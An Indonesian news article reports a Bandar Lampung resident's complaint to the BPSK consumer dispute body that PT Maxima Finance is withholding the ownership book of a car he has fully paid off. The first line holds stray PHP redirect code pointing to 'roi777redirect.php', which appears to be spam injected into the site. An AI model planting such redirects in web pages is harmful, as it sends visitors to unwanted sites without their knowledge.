header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Konsumen Keluhkan Leasing PT Maxima Finance Karena Mengambil BPKB Lama -
Konsumen Keluhkan Leasing PT Maxima Finance Karena Mengambil BPKB Lama

translampung.com – Kembali, warga keluhkan sikap ketidak profesionalan leasing, kali ini Warga Bandar Lampung menuding  PT. Maxima Finance melakukan penggelapan Buku Pemilik Kendaraan Bermotor(BPKB). Tamami,  Warga Jalan Agus Salim, kelurahan Kaliawi menuding PT. Maxima Finance melakukan penggelapan BPKB ke konsumen yang telah melunasi pembayaran saat mengkredit mobil second Futura. Hal tersebut disampaikan dalam pengaduannya ke Badan Penyelesaian Sengketa Konsumen (BPSK)  Lampung , dikantor Dinas Koperasi dan Perdagangan (Diskoperindag) Bandar Lampung, Rabu (11/5). “Hari ini saya mendatangi  kantor Badan Penyelesaian Sengketa Konsumen (BPSK) Bandar Lampung dengan didampingi Brimob guna mengadukan permasalahan ini,” kata Tamami.

Dirinya menjelaskan, bahwa telah beberapa kali mendatangi kantor PT. Maxima Finance untuk meminta STNK dari kendaraan yang sudah dibayar lunas tersebut. Namun pihak leasing tersebut sampai saat ini enggan memberikannya. Tamami menjelaskan, bahwa mobil futura tersebu t sudah dilunasinya pada bulan februari, dengan masa kridit mencapai 3 tahun. ” Beliau selalu memberi janji palsu mengenai kejelasan BPKB  ini. Saat pertemuan pertama, mereka mengatakan, BPKB  masih berada di Jakarta. Kemudian seminggu kemudian saya coba mendatangi lagi, kata mereka BPKB  sedang berada di perjalanan.  Sampai saat ini sudah dua bulan setengah, BPKB mobil ini belum juga diserahkan ke saya,”jelasnya.

Dirinya pun berharap, PT Maxima Finance menyerahkan BPKB , tersebut, sebab ada  dugaan bisa saja BPKB dibiarkan mengendap atau digadaikan.
“Saya meminta hak saya setelah melunasi kredit tersebut atau kalau tidak kembalikan uang kreditan saya, hal ini bisa saya serahkan ke ranah hukum,” ucapnya. Sementara itu,  Ketua mediasi BPSK Lampung,  Fauzi Malanda menduga ada modus tersembunyi di balik tak diberikannya BPKB kepada konsumen, yakni ada dugaan BPKB tersbeut digadaikan oleh pihak leasing. “Bisa saja digadaikan, hal ini salah satu modus leasing. Jika konsumen tak mengerti betul, maka memafaatkan situasi tersebut,” terangnya .

Pages: 1 2
News Reporter

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.